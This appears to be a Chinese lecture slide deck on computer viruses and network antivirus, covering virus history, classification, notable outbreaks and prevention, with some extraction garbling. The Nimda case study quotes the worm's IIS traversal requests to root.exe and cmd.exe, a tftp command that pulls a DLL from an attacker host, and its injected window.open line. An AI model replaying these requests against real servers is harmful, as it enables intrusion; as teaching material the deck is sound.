chapter3网络防病毒

1、第三章第三章 网络防病毒网络防病毒深职院 计算机网络技术专业池瑞楠本章主要内容Key Questions 计算机病毒的定义 病毒发展史 计算机病毒的特点 病毒分类 计算机病毒的发展趋势 病毒实例 病毒的防护网络安全防护体系构架网络安全防护体系构架网络安全评估安全防护网络安全服务系统漏洞扫描网络管理评估病毒防护体系网络监控数据保密网络访问控制应急服务体系安全技术培训数据恢复一、计算机病毒的定义 1994年2月18日，我国正式颁布实施了中华人民共和国计算机信息系统安全保护条例，在条例第二十八条中明确指出：“计算机病毒，指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据破坏计算机功能或者破坏数

2、据，影响计算机使用并且能够自我复制能够自我复制 的一组计算机一组计算机指令或者程序代码指令或者程序代码 ”。 病毒：Virus二、计算机病毒的发展史 1、计算机病毒的产生的思想基础和病毒发展简介 2、实验室中产生病毒的祖先（磁芯大战） 3、计算机病毒的出现（1983年） 4、我国计算机病毒的出现 （1989年）病毒的产生原因n（1）编制人员出于一种炫耀和显示自己能力的目的n（2）某些软件作者出于版权保护的目的而编制 n（3）出于某种报复目的或恶作剧而编写病毒 n（4）出于政治、战争的需要计算机病毒的发展历程 1. DOS引导阶段 2. DOS可执行阶段 3. 伴随阶段 4. 多形阶段 5. 生

3、成器、变体机阶段 6. 网络、蠕虫阶段 7. 视窗阶段 8. 宏病毒阶段 9. 邮件病毒阶段 10. 手持移动设备病毒阶段 时代划分时间总结第一代：传统病毒1986-1989DOS引导阶段DOS可执行阶段第二代：混合病毒(超级病毒)1989-1991伴随、批次型阶段第三代：多态性病毒1992-1995幽灵、多形阶段生成器、变体机阶段第四代：90年代中后宏病毒阶段网络、蠕虫阶段典型的计算机病毒事件时间名称事件1986Brain 第一个病毒（软盘引导）1987黑色星期五病毒第一大规模爆发1988.11.2蠕虫病毒 第一个蠕虫计算机病毒 1990.1“4096”发现首例隐蔽型病毒，破坏数据1991

4、病毒攻击应用于战争 1991米开朗基罗第一个格式化硬盘的开机型病毒1992VCL- Virus Creation Laboratory病毒生产工具在美国传播时间名称事件1992年9月首例Windows病毒1995FAT病毒、幽灵、变形金刚多态性（基于）windows）1997宏病毒 传播方式增加（邮件等）1999CIH发现破坏计算机硬件病毒1999 Mellisahappy99邮件病毒2000红色代码黑客型病毒2001Nimda集中了所有蠕虫传播途径2002SQLSPIDA.B第一个攻击SQL服务器2003SQL_slammer利用SQL server数据库的漏洞2003.8.11冲击波集中了

5、所有蠕虫传播途径2006年十大病毒 2006年出现的新病毒数量急剧增加，达到234211个，几乎等于以往所有病毒数量的总和。 这些新病毒，90%以上带有明显的利益特征，有窃取个人资料、各种账号密码等行为。其中，窃取用户账号密码等个人虚拟财产信息的病毒共167387个，占到总病毒数量的71.47%。这一年，中国还出现了首个勒索病毒“进程杀手变种”。2006年十大病毒序序号号病毒中文名累计感染计算机 类型类型感染系统感染系统1“熊猫烧香” 蠕虫Win2000/XP2威金蠕虫 446450蠕虫Win9X/2000/XP/NT/Me/20033传奇窃贼 739169 木马Win9X/2000/XP/N

6、T/Me/20034敲诈者 木马Win9X/2000/XP/NT/Me/20035QQ盗号木马 615901 木马Win9X/2000/XP/NT/Me/20036龌龊虫 20351 蠕虫Win9X/2000/XP/NT/Me7灰鸽子后门 897592 木马Win9X/2000/XP/NT/Me8工行钓鱼木马 42838木马Windows 2000、Windows XP9征途木马变种木马Win9X/2000/XP/NT/Me10调用门Rootkit Win3X/9X/2000/XP/NT/Me/2003近年新增病毒数量对比2007年各类病毒/木马比例2007年十大病毒/木马数据来源：金山软件发

7、布的数据来源：金山软件发布的2007年度中国电脑病毒疫情及互联网安全年度中国电脑病毒疫情及互联网安全报告报告（2008/1/17）2008年上半年病毒数量2008年度上半年十大病毒排行 FROM：江民科技 2008年上半年病毒种类分析计算机病毒的危害 1、计算机病毒造成巨大的社会经济损失 2、影响政府职能部门正常工作的开展 3、计算机病毒被赋予越来越多的政治意义 4、利用计算机病毒犯罪现象越来越严重病毒带来的威胁三、计算机病毒的特征 传染性 破坏性 潜伏性和可触发性 非授权性 隐藏性 不可预见性病毒名：Backdoor/Huigezi.2005（灰鸽子2005） 1.病毒运行后，将创建下列文件

8、(安全模式下查看)： %WinDir%IExplorer.exe，病毒程序 %WinDir%IExplorer.dll, 病毒程序 %WinDir%IExplorer_Hook.dll, 病毒程序 2.通过修改如下注册表项，将病毒自身添加为服务 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPower supply management 3.将IExplorer_Hook.dll注入到系统每个进程中，通过hook系统函数来达到隐藏自身的目的。 (1)隐藏病毒自身进程，通过任务管理器无法查找到病毒进程。 (2)隐藏病毒自身文件，正常模式下查看不

9、到病毒文件。 (3)隐藏自身添加的服务，使自己从服务列表中消失。 四、计算机病毒有哪些种类？依据不同的分类标准，计算机病毒可以做不同的归类。常见的分类标准有：1. 根据病毒依附的操作系统2. 根据病毒的传播媒介3. 根据病毒的传染途径病毒攻击的操作系统 Microsoft DOS Microsoft Windows 95/98/ME Microsoft Windows NT/2000/XP Unix(Linux) 其他操作系统病毒攻击的操作系统图例(数据来源于瑞星病毒样本库)DOSDOS43%43%UnixUnix3%3%OtherOther1%1%WindowWindows s53%53%D

10、OSDOSWindowsWindowsUnixUnixOtherOther病毒的传播媒介存储介质网络1. 邮件(SoBig)2. 网页(RedLof)3. 局域网(Funlove)4. 远程攻击(Blaster)5. 网络下载病毒网络传播方式图例(数据来源于瑞星病毒样本库)邮件邮件47%47%局域网局域网9%9%远程攻远程攻击击4%4%网页网页40%邮件邮件网页网页局域网局域网远程攻击远程攻击病毒的传播和感染对象感染引导区感染文件可执行文件OFFICE宏网页脚本（ Java小程序和ActiveX控件）网络蠕虫网络木马破坏程序其他恶意程序病毒演示病毒演示病毒演示CIH病毒病毒病毒演示彩带病毒病毒

11、演示女鬼病毒病毒演示千年老妖病毒演示圣诞节病毒病毒演示白雪公主巨大的黑白螺旋占据了屏幕位置，使计算机使用者无法进行任何操作！红色代码 1() 病毒发作现象病毒发作现象引导型病毒 文件型病毒 文件型病毒的特点是附着于正常程序文件，成为程序文件的一个外壳或部件。 文件型病毒主要以感染文件扩展名为.com、.exe和.bat等可执行程序为主。 大多数的文件型病毒都会把它们自己的代码复制到其宿主文件的开头或结尾处。 计算机病毒引起是异常情况 计算机系统运行速度明显降低 系统容易死机 文件改变、破坏 磁盘空间迅速减少 内存不足 系统异常频繁重

12、启动 频繁产生错误信息常见DOS病毒分析1引导记录病毒 （1）引导型病毒的传播、破坏过程 （2）引导型病毒实例：小球病毒 2文件型病毒（1）文件型病毒的类型 （2）文件型病毒的感染方式 （3）.COM文件的感染 （4）.EXE文件的感染 （5）.SYS文件的感染 宏病毒的行为和特征 宏病毒是一种新形态的计算机病毒，也是一种跨平台式计算机病毒。可以在Windows、Windows 95/98/NT、OS/2、Macintosh 等操作系统上执行病毒行为。 宏病毒的主要特征如下： 1）宏病毒会感染.DOC文档和.DOT模板文件。 2）宏病毒的传染通常是Word在打开一个带宏病毒的文档或模板时，激活

13、宏病毒。 3）多数宏病毒包含AutoOpen、AutoClose、AutoNew和AutoExit等自动宏，通过这些自动宏病毒取得文档（模板）操作权。 4）宏病毒中总是含有对文档读写操作的宏命令。5）宏病毒在.DOC文档、.DOT模板中以BFF（Binary File Format）格式存放，这是一种加密压缩格式，每个Word版本格式可能不兼容。6）宏病毒具有兼容性。 宏病毒的特点 1传播极快 2制作、变种方便 3破坏可能性极大宏病毒的防治和清除方法Word宏病毒，是近年来被人们谈论得最多的一种计算机病毒。与那些用复杂的计算机编程语言编制的病毒相比，宏病毒的防治要容易得多！在了解了Word宏病

14、毒的编制、发作过程之后，即使是普通的计算机用户，不借助任何杀毒软件，就可以较好地对其进行防冶。 1. 查看“可疑”的宏 2按使用习惯编制宏 3防备Autoxxxx宏 4小心使用外来的Word文档 5使用选项“Prompt to Save Normal Template” （工具-选项-保存）6查看宏代码并删除 7. 将文档存储为RTF格式 8设置Normal.dot的只读属性 9 Normal.dot的密码保护 10使用OFFICE 的报警设置 网络化病毒的特点 网络化：传播速度快、爆发速度快、面广 隐蔽化：具有欺骗性（加密） 多平台、多种语言 新方式：与黑客、特洛伊木马相结合 多途径： 攻击

15、反病毒软件 变化快（变种） 清除难度大 破坏性强 蠕虫病毒 通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,同时具有自己的一些特征，如不利用文件寄生（有的只存在于内存中）,对网络造成拒绝服务，以及和黑客技术相结合等等。蠕虫病毒与其他病毒的区别普通病毒蠕虫病毒存在形式 寄存文件独立程序传染机制宿主程序运行主动攻击传染目标本地文件网络计算机蠕虫病毒的特点 破坏性强 传染方式多 一种是针对企业的局域网，主要通过系统漏洞；另外一种是针对个人用户的, 主要通过电子邮件,恶意网页形式迅速传播的蠕虫病毒。 传播速度快 清除难度大实例：2003蠕虫王 病毒实例Nimda及解决方案感

16、染 Win 95/98/NT/2000 系统1.通过email 在internet临时文件夹中读取所有htm， h t m l 文 件 并 从 中 提 取 e m a i l 地 址 ，从信箱读取email并从中提取SMTP服务器，然后发送readme.eml。NimdaNimda-2.利用 IIS、IE 的安全漏洞 CodeRedII会在IIS的几个可执行目录下放置root.exeNimda首先在udp/69上启动一个tftp服务器然后会作以下扫描： GET /scripts/root.exe?/c+dir HTTP/1.0GET /MSADC/root.exe?/c+dir HTTP/1.

17、0GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0一 旦 发 现 有 弱 点 的 系 统 就 使 用 类 似 下 面 的 命 令GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx G E T A d m i n . d l l H T T P / 1 . 0把文件传到主机上去，然后再GET /scripts/Admin.dll HTTP/1.0NimdaNimda- - 3.通过WWW服务 在所有文件名中包含defau

18、lt/index/main/readme并且扩展名为htm/html/asp的文件所在目录中创建readme.eml，并在文件末加上下面这一行window.open(readme.eml, null, resizable=no,top=6000,left=6000)也就是说如果一台web服务器被感染了，那么大部分访问过此服务器的机器都会被感染。 NimdaNimda- - 4.通过局域网的共享 Nimda会搜索本地的共享目录中包含doc文件的目录，一但找到，就会把自身复制到目录中命名为riched20.dll 病毒实例Nimda及解决方案首先对网络中的工作站进行全面清查对已感染的工作站进行彻底

19、的杀毒，然后对已染毒的服务器杀毒以保证整个网络系统是干净的；对网络中的服务器及工作站进行软件升级等一系列后续工程，杜绝再次染毒打微软IIS、IE的补丁最后着重对服务器进行本地安全策略的设置，做好防范工作，做到即使服务器再次中毒也不能影响整个服务器的正常工作及整个网络系统的正常运转。反病毒技术简述计算机病毒诊断技术计算机病毒诊断技术 1特征代码法 2校验和法 3行为监测法 4软件模拟法五、病毒的预防措施 安装防病毒软件 定期升级防病毒软件 不随便打开不明来源 的邮件附件 尽量减少其他人使用你的计算机 及时打系统补丁 从外面获取数据先检察 建立系统恢复盘 定期备份文件 综合各种防病毒技术STOP!服务器端防毒客户端防毒防毒防毒集中管理器集中管理器STOP!STOP!Mail ServerSTOP!全方位的网络病毒防护体系STOP!Meb Server File ServerSTOP!网络病毒的特点及传播方式网络病毒的特点 网络病毒的传播方式 v 全网统一配置防毒策略。v 全网统一查杀病毒,没有死角。v 全网统一升级版本统一。v 全网防毒状况一目了然。v 跨平台技术，全方位防病毒v 全网防毒工作轻松简单：自动安装、自动维护、自动更新单机版与网络版的区别单机防毒网络防毒网络防毒选择防毒软件的标准 “高侦测率